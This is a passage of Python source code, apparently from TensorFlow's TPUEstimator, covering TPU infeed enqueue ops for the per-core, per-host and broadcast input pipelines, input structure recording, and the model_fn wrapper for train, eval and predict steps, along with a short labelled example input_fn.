# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing it as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
sparse_features_list = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, sparse_features = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
sparse_features_list.append(sparse_features)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
sparse_features_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas (including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples, one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested structure
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as it expects flattened lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# user's `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is the dtypes and shapes, so any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Performs some sanity checks and logs user-friendly information. Ideally we
should error out to give users a better error message, but if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so we only log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
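# --- Illustrative sketch (not part of the original library code) ------------
# `_InputPipeline` above expects `input_fn` to return one of the forms listed
# in its docstring; the PER_HOST_V2 and PREDICT configurations require a
# `tf.data.Dataset`. A minimal user-side input_fn might look like the sketch
# below. The toy numpy arrays and the feature name 'x' are assumptions for
# illustration; `params['batch_size']` is populated by TPUEstimator.
def _example_input_fn(params):
  import numpy as np
  import tensorflow as tf  # assumed available in the user's program
  x = np.random.rand(1024, 8).astype(np.float32)
  y = np.random.randint(0, 10, size=(1024,)).astype(np.int32)
  dataset = tf.data.Dataset.from_tensor_slices(({'x': x}, y))
  dataset = dataset.repeat().shuffle(1024)
  # drop_remainder=True keeps the batch dimension static, which TPU infeed
  # requires for fixed shapes.
  return dataset.batch(params['batch_size'], drop_remainder=True)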
def call_computation(computation,
experimental_exported_model_uses_all_cores=True):
"""Call computation.
computation uses a single-core for TPU inference. If
`experimental_exported_model_uses_all_cores` is `True`, this function will
round-robin
computation among all TPU cores visible to the host; otherwise, it will use
a single core.
Args:
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
experimental_exported_model_uses_all_cores: Whether to round-robin among all
cores visible to the host, or to use a single core.
Returns:
A list of output tensors.
"""
if experimental_exported_model_uses_all_cores:
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
@function.Defun()
def tpu_subgraph():
return computation()
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ordinal_selector_op.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
else:
return computation()
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent, and
performs the necessary checks and mutations required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features):
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat many times and then replicated to
all TPU shards. Besides, the input should be taken from TPU infeed rather
than from the input pipeline (input_fn) directly. To fit the TPU loop and
replicate pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
tracing_ops = []
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss, tracing_ops = tt.trace_tpu(ops.get_default_graph(),
loss, train_op,
self._ctx.num_replicas,
self._ctx.num_of_replicas_per_host,
self._ctx.num_hosts)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
apply_sparse_grads = [tpu_embedding_.generate_send_gradients_op()]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + tracing_ops +
apply_sparse_grads):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, an eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat many times and then replicated to
all TPU shards. Besides, the input and output are slightly different. The
input, features and labels, should be taken from the TPU infeed rather than
from the input pipeline (input_fn) directly. The output is managed in two
stages. First, the model outputs, as the result of the evaluation computation
(usually model logits), should be transferred from the TPU system to the CPU.
Then, all model outputs are concatenated on the CPU and sent to the metric_fn
for metrics computation. To fit the TPU evaluation pattern, the original eval
computation should be reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of (eval_fn, host_calls, captured scaffold_fn, captured eval hooks).
The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of (predict_fn, host_calls, captured scaffold_fn, captured predict
hooks). The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for the prediction dictionary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
